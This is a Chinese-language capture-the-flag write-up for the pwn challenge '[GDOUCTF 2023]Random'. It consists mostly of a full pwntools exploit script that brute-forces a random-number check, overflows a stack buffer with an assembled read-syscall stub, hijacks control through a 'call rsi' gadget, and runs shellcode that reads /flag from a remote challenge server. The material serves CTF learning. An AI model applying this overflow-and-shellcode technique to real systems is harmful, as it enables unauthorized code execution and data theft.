Problem: [GDOUCTF 2023]Random
思路
随机数直接爆破，然后有个 call rsi
栈底是rsi
.text:0000000000400931 lea rax, [rbp+buf]
.text:0000000000400935 mov edx, 40h ; '@' ; nbytes
.text:000000000040093A mov rsi, rax ; buf
我们直接在栈写payload
调用syscall read 读入bss
读进bss的就是我们的orw payload
完事了继续 call，可以调用栈上的，或者汇编写应该都可以
EXP
from pwn import *
from LibcSearcher import *
#from LibcSearcher import *
# Global pwntools context. 'debug' makes the tube log every byte sent to and
# received from the target, which is what the transcript-style write-up relies on;
# 'amd64' selects the assembler/packing defaults used by asm()/p64() below.
context(log_level='debug', arch='amd64')
# Live target used for the submitted run; the local process() line is kept
# commented out for offline testing against the same binary.
io = remote("node5.anna.nssctf.cn",29191)
#io = process("./RANDOM")
# The challenge binary. It is loaded but the addresses used later are hard-coded
# rather than looked up through this object.
e = ELF('./RANDOM')
#libc = ELF('./libc-2.31.so')
def get_addr():
    """Leak a 64-bit pointer from the target's output.

    Reads up to and including the first 0x7f byte (the high byte of a
    typical user-space address), keeps the last 6 bytes, zero-pads them to
    8 bytes and unpacks them little-endian with pwntools' ``u64``.

    Not used by the exploit flow below (no libc leak is needed); kept as a
    helper.
    """
    raw = io.recvuntil(b'\x7f')
    tail = raw[-6:]
    padded = tail + b'\x00' * (8 - len(tail))
    return u64(padded)
def bug():
    """Attach a debugger to the live tube (manual breakpoint helper).

    Only meaningful against a local ``process()`` target; the call site
    below is commented out for the remote run.
    """
    target = io
    attach(target)
def s(data):
    """Send raw ``data`` to the target (no newline appended)."""
    return io.send(data)


def sa(delim, data):
    """Wait until ``delim`` appears in the output, then send ``data``."""
    return io.sendafter(delim, data)


def sl(data):
    """Send ``data`` followed by a newline."""
    return io.sendline(data)


def sla(delim, data):
    """Wait until ``delim`` appears, then send ``data`` plus a newline."""
    return io.sendlineafter(delim, data)


def r(num):
    """Receive up to ``num`` bytes from the target."""
    return io.recv(num)


def ru(delims, drop=True):
    """Receive until ``delims`` is seen; ``drop`` strips the delimiter itself."""
    return io.recvuntil(delims, drop)


def itr():
    """Hand the connection over to the user."""
    return io.interactive()


def uu32(data):
    """Unpack a little-endian u32 from up to 4 bytes, zero-padded on the right."""
    return u32(data.ljust(4,b'\x00'))


def uu64(data):
    """Unpack a little-endian u64 from up to 8 bytes, zero-padded on the right."""
    return u64(data.ljust(8,b'\x00'))


def ls(data):
    """Log ``data`` at pwntools' 'success' level."""
    return log.success(data)


# Addresses taken from the binary. The 0x400000-range values (matching the
# .text listing in the write-up above) indicate a non-PIE binary, so they are
# used as fixed constants.
call_rsi = 0x400c23   # address of the `call rsi` instruction named in the write-up
bss = 0x6010b0        # writable .bss scratch area that receives the second stage
# Stage 0: the binary's "random number" check is passed by guessing
# (随机数直接爆破 in the write-up); 50 attempts is the author's chosen bound.
# NOTE(review): there is no failure path — if all 50 guesses are rejected the
# script still falls through to the payload stage below.
for i in range(50):
    sla(b"num:",str(i))
    io.recvline()
    msg = io.recvline()
    ls(msg)
    if b"no" in msg:
        # Rejected guess (the target answers with "no"); try the next value.
        pass
    else:
        ls("success get num")
        break
# Stage 1: a small "read more, then jump" stub. It performs
# read(0, 0x6010b0, 0xFFFF) through a raw syscall (rax = 0 is SYS_read on
# x86-64); the syscall does not clobber rsi, so the following `call rsi`
# transfers control to whatever was just read into .bss (the second stage).
# The literal 0x6010b0 is the same value as the `bss` constant above, kept
# inline because it lives inside the assembly string.
code = """
xor rax,rax
mov rdi,0
mov rsi,0x6010b0
mov rdx,0xFFFF
syscall
call rsi
"""
# Pad the assembled stub to exactly 0x20 bytes.
# NOTE(review): ljust never truncates, so if the stub ever assembled to more
# than 0x20 bytes the layout below would silently shift; the length is logged
# right after so this can be checked by eye.
asm_code = asm(code).ljust(0x20,b'\x00')
# Layout written into the stack buffer: stub | 8 filler bytes | address of `call rsi`.
# Per the disassembly in the write-up, rsi still points at this buffer when the
# gadget runs, so presumably the overwritten return slot redirects into the stub.
# The 0x20 + 8 offset comes from the author's local analysis and is not derivable
# from this listing alone.
payload = asm_code + b'a'*8 +p64(call_rsi)
ls("asm_code=>"+hex(len(asm_code)))
#bug()
sla("your door",payload)
# Stage 2: pwntools' canned open/read/write of /flag (the "orw payload" in the
# write-up), delivered to the stub's read() and then executed by its `call rsi`.
code1 = shellcraft.cat('/flag')
payload1 = asm(code1)
s(payload1)
io.interactive()
总结
- 对该题的考点总结